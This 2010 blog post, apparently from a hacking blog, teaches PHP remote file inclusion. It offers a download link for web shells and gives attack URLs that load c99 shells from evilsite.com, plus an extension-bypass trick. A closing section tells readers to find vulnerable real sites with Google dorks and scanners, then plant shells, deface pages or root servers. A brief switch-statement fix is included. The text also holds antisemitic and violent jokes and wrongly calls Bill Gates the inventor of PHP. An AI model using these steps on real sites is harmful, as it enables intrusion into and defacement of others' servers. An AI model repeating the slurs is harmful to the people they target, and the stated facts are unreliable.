Saturday, September 18, 2010

RFI- Remote File Inclusion

0

First of all download these shells, further we'll continue...




LINK-http://www.mediafire.com/?yl1inzliudz


RFI Tutorial (remote file inclusion)
Basically, the include function in PHP allows contents from local or remote files to be pretty much "copied and pasted" and executed in a script at runtime.


Now suppose yo' dad wants a small website. All he wants is three pages.
A blog page where he can update you on how many babies he has killed.
A contact page with his email on it os people can ask advice on the best way to kill babies.
An gallery page where he can show you pictures of all the babies he has killed.


He creates four pages. blog.php, contact.php and gallery.php along with index.php, this is our "main" page that will contain a header, a side bar for navigation, some php and a footer.


You would view the pages on his website like this.
Code:
http://www.yodad.com/index.php?page=blog.php
http://www.yodad.com/index.php?page=contact.php
http://www.yodad.com/index.php?page=gallery.php
Let's take a look at the code for index.php


Code:
//html for header
//html for menu
$page = $_GET['page'];
include($page);
?>
//html for footer
On line 2, $page is set to $_GET['page']


This means when we go to
Code:
http://www.yodad.com/index.php?page=blog.php
$page is set to blog.php.
On line 3 it is "included". The contents from blog.php is copied and pasted into index.php


What's wrong with this? Well as I said earlier the include function can also include remote files. Files NOT on his web server.


Say we change "blog.php" to "http://www.google.com"
Code:
http://www.yodad.com/index.php?page=http://www.google.com
You would see the google home page instead of your dads shitty blog.


What's the point of this?


We can include "bad" or "evil" scripts. Some of you may heard of "shells" (r57,c99,g00nshell,peanut). Shells are scripts with functions like letting you view directories of the server it's executed on, deleting files, viewing files, letting you run system commands and more.


Here's how we would use it:
Code:
http://www.yodad.com/index.php?page=http://evilsite.com/c99.txt
* We have to use the shell as .txt so it's plaintext. If we used .php then the script would be executed on http://www.evilsite.com.


Let's look at another example of a RFI.


Undefined variables.


Say yo' dad has learned how to use MySQL and to put content on his blog page he uses a form he created to connect to his MySQL server and insert his stories into a table.


To connect to the MySQL server & add content he needs a username & a password. He stores these in a file called "db_details.php".


The blog.php file needs these credentials to connect and get the content.


so in index.php:
Code:
//html for header
//html for menu
$database_config_file = "db_details.php";
$page = $_GET['page'];
include($page);
?>
//html for footer
and in blog.php:


Code:
include($database_config_file);
//code to connect to MySQL and get the latest blog posts
?>
Since we are calling blog.php through index.php like this:
Code:
http://www.yodad.com/index.php?page=blog.php
, in index.php $database_config_file is set to "db_details.php" and in blog.php it is included. There is no problem there, it then can connect to the MySQL server with the credentials and retrieve his blog content.


But, if we went to blog.php directly:
Code:
http://www.yodad.com/blog.php
then $database_config_file is not set to anything. It still includes it but it is including nothing. Since we did not use index.php to access it, we did not get: $database_config_file = "db_details.php";


This is a problem, since we can set it ourselves.
If we go to
Code:
http://www.yodad.com/blog.php?database_config_file=http://evilsite.com/c99.txt
$database_config_file will be set to http://www.evilsite.com/c99.txt


Again, blog.php does not check if what it is including is valid.


...


As the famous inventor of PHP, Bill Gates says: There is more than one way to do it.


There are a few ways to prevent these vulnerabilities.


Yo' dad thinks he has gotten smart and has put in a method to stop little leet haxors like you.
This one is easily bypassed.
index.php:


Code:
$page = $_GET['page'];
include($page . ".php");
?>
This means when we go to index.php?page=home it will actually include home.php.


Omg, dat meanz it wont include my .txt, it will try to include .txt.php Sad.


Not necessarily. If we put a question mark after the ".txt" then anything that index.php puts after $page will go to the remote script we are including.


Like this:
Code:
http://www.yodad.com/index.php?page=http://evilsite.com/c99.txt
Index.php would try and include :
Code:
http://www.evilsite.com/c99.txt?.php
To prevent the problem with variables not being defined. Just make sure you define every variable that gets used.




There are a few other ways to prevent these vulnerabilities involving cleaning the input, checking if files exist etc but since I'm only typing with my big jew nose right now I can't be bothered going through them so I'm going to just do the most practical;


Switching.


Code:
$page = $_GET['page'];
switch($page){
case "blog":
include("blog.php");
break;
case "contact":
include("contact.php");
break;
case "gallery":
include("gallery.php");
break;
default: //A page wasn't chosen, or one that wasn't "home" or "gallery"
echo "Choose a page from our fine selection!1!!";
break;
}
?>


Regards


~Shubham h4ck3r
PENETRATION ENGINEER




--------------------if u can't understand read the below easy post------------
We now need to find a RFI vulnerable site. It has something to do with the inclusion php code so you will need a site that looks like this
http://www.site.com/index.php?page=hello.php

Obviously it won't say hello.php but it will be something like that. Now keep in mind not every site that looks like that is vulnerable.

You need google dorks or you can just do it by using a scanner (easier) I got a good all around RFI scanner I'll post in a minute. To get more just search on here or google.

RFI google dorks: 
http://pastie.org/416784



Now we should have a vuln site. Lets try to put our shell. This is so easy.

Replace hello.php or whatever with your shell
example:
http://www.site.com/index.php?page=http:..._shell.txt

Try that. If it doesn't work try putting a ? at the end of txt. If it still doesn't work then it's not vulnerable.

Once your in your shell.
The things you can do is unlimited. If your new defacing the index file is fun lol. Or you can like root the server which is all around better. But it's your choice you could spend a day in a shell and not get bored lol.





thats all....
happy hacking




///end of this post ///



0 comments:

Post a Comment

 
Design by ThemeShift | Bloggerized by Lasantha - Free Blogger Templates | Best Web Hosting